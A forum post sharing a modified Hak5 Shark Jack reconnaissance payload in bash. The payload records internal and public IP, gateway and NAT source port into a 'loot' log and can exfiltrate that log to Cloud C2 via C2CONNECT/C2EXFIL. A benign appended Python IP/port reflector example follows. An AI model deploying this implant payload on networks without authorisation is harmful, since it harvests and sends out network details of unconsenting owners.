[PAYLOAD] IP Info


Darren Kitchen

Yay! Thank you @Darren Kitchen, that's about what I wanted to create today. There is just one downside: many of our Internet providers nowadays are using carrier-grade NAT (https://en.wikipedia.org/wiki/Carrier-grade_NAT), and to really identify the Internet connection one also needs to know the source port and the exact time of a connection... I searched for quite some time to find a service actually providing this information and included the port information in the logging. I am pretty sure that there should be some more reliable way of obtaining this information (like from an API), but currently I can't find any. Any suggestions are welcome!

#!/bin/bash
#
# Original Payload: IP Info by Hak5Darren
# Original Link:    https://github.com/hak5/sharkjack-payloads/blob/master/payloads/library/recon/ipinfo/payload.sh
#
# Description:  This payload gathers internal and external IP address info,
# including default gateway and the public source port a remote web server
# saw for our connection (behind carrier-grade NAT the tuple of public IP,
# source port and time is what identifies a connection), saving the log to
# the loot directory and optionally exfiltrating the log to Cloud C2 if
# CLOUDC2=1
#
# LED SETUP (Magenta)... Setting logs and waiting for IP address from DHCP
# LED ATTACK (Yellow Blink)... Saving IP address information
# LED FAIL (Red Blink)... Failed to gather public IP address
# LED SPECIAL (Cyan Blink)... Exfiltrating log to Cloud C2
# LED FINISH (Green Fast Blink to Solid)... Payload successful
 
CLOUDC2=0
LOOT_DIR=/root/loot/ipinfo
PUBLIC_IP_URL="http://ipinfo.io/ip"
# Page that echoes the remote port of the connection. The port is scraped
# from HTML, so this breaks silently if the site changes its layout.
PUBLIC_PORT_URL="http://www.dnstools.ch/wie-ist-meine-ip.html"
 
function FAIL() { LED FAIL; exit 1; }
LED SETUP
 
# Make log file, numbered after the files already in the loot directory
mkdir -p "$LOOT_DIR"
LOG_FILE="ipinfo_$(find "$LOOT_DIR" -type f | wc -l).log"
LOG="$LOOT_DIR/$LOG_FILE"
 
# Ask for IP address
NETMODE DHCP_CLIENT
 
# Wait until Shark Jack has an IP address
while ! ifconfig eth0 | grep -q "inet addr"; do sleep 1; done
 
LED ATTACK
# Gather IP info and save log
INTERNALIP=$(ifconfig eth0 | grep "inet addr" | awk '{print $2}' | awk -F: '{print $2}')
GATEWAY=$(route | grep default | awk '{print $2}')
PUBLICIP=$(wget --timeout=30 "$PUBLIC_IP_URL" -qO -) || FAIL
[ -n "$PUBLICIP" ] || FAIL
 
# Take the timestamp right before the port lookup: it is the time of that
# connection that has to match the provider's NAT log. The port is optional,
# so a failure here leaves the field marked unknown instead of aborting.
# Note that behind CGNAT each connection gets its own port, so the port
# below belongs to the PUBLIC_PORT_URL request, not the PUBLIC_IP_URL one.
STAMP=$(date)
PUBLICPORT=$(wget --timeout=30 "$PUBLIC_PORT_URL" -qO - | grep 'Remote Port' | grep -oE '[[:digit:]]{2,5}' | head -n 1)
[ -n "$PUBLICPORT" ] || PUBLICPORT="unknown"
 
{
    echo "Date: $STAMP"
    echo "Internal IP Address: $INTERNALIP"
    echo "Public IP Address: $PUBLICIP"
    echo "Public Port Number: $PUBLICPORT"
    echo "Gateway: $GATEWAY"
    echo
} >> "$LOG"
 
# Optionally connect to Cloud C2, wait for connection and exfiltrate loot
if [ "$CLOUDC2" = "1" ]; then
    LED SPECIAL
    C2CONNECT
    while ! pgrep cc-client; do sleep 1; done
    C2EXFIL STRING $LOG IPinfo
fi
 
LED FINISH

PS: I couldn't find the bash highlighting...

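The reply above scrapes the source port from a third-party HTML page because no API for it could be found. The most reliable way to get the (public IP, source port, time) tuple that a carrier-grade NAT log is keyed on is to run the reflector yourself: any server you control sees the post-NAT address and port of each TCP connection. The following is an added example, not part of the forum post or of the Hak5 payload. It implements such a reflector with Python's standard library and a client that writes a CGNAT-friendly log record; the public hostname reflector.example.net mentioned in the code is a hypothetical placeholder, and the script binds to 127.0.0.1 so it runs offline.

```python
"""Self-hosted "what is my IP and port" reflector plus a client that records
the tuple a carrier-grade NAT log is keyed on: public IP, source port, time.

Added example (not the forum post's or Hak5's code). In real use the reflector
runs on a host you control with a public address (hypothetical name
reflector.example.net); here both sides run on 127.0.0.1 so it works offline.
"""
import json
import threading
import urllib.request
from datetime import datetime, timezone
from http.server import BaseHTTPRequestHandler, HTTPServer


class ReflectHandler(BaseHTTPRequestHandler):
    """Return the TCP peer (address, port) the server actually accepted.

    When the client sits behind carrier-grade NAT this is the CGNAT's public
    address and the port it allocated for this one connection, which is the
    tuple the provider's NAT logs use to map a connection back to a customer.
    """

    def do_GET(self):
        ip, port = self.client_address[0], self.client_address[1]
        body = json.dumps({"ip": ip, "port": port}).encode()
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):
        # Keep the server quiet; the client writes the log we care about.
        pass


def start_reflector(host="127.0.0.1", port=0):
    """Start the reflector in a daemon thread; return (server, base_url)."""
    server = HTTPServer((host, port), ReflectHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, "http://%s:%d/" % server.server_address


def parse_reflector_response(raw):
    """Validate the reply so a broken or tampered response cannot poison the log."""
    data = json.loads(raw)
    ip = str(data["ip"])
    port = int(data["port"])
    if not 1 <= port <= 65535:
        raise ValueError("port out of range: %r" % port)
    return ip, port


def lookup_public_endpoint(url, timeout=30):
    """Query the reflector and return (public_ip, source_port, utc_timestamp).

    The timestamp is taken for this very connection and written in UTC with an
    explicit zone, because a local-time stamp is ambiguous when handed to an
    ISP whose NAT logs are in a different zone.
    """
    # Bypass any http_proxy from the environment: a proxy would make the
    # reflector see the proxy's address and port, not ours.
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))
    stamp = datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
    with opener.open(url, timeout=timeout) as resp:
        ip, port = parse_reflector_response(resp.read().decode())
    return ip, port, stamp


def format_log_record(ip, port, stamp):
    """Same fields the Shark Jack payload logs, in the same order."""
    return ("Date (UTC): %s\nPublic IP Address: %s\nPublic Port Number: %d\n"
            % (stamp, ip, port))


if __name__ == "__main__":
    server, url = start_reflector()
    try:
        ip, port, stamp = lookup_public_endpoint(url)
        print(format_log_record(ip, port, stamp))
    finally:
        server.shutdown()
        server.server_close()
```

Each HTTP request is its own TCP connection, so the port in the record is the one the reflector saw for that request only; do not pair it with an IP fetched from a different service over a different connection, as a CGNAT may have used a different port for that one.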
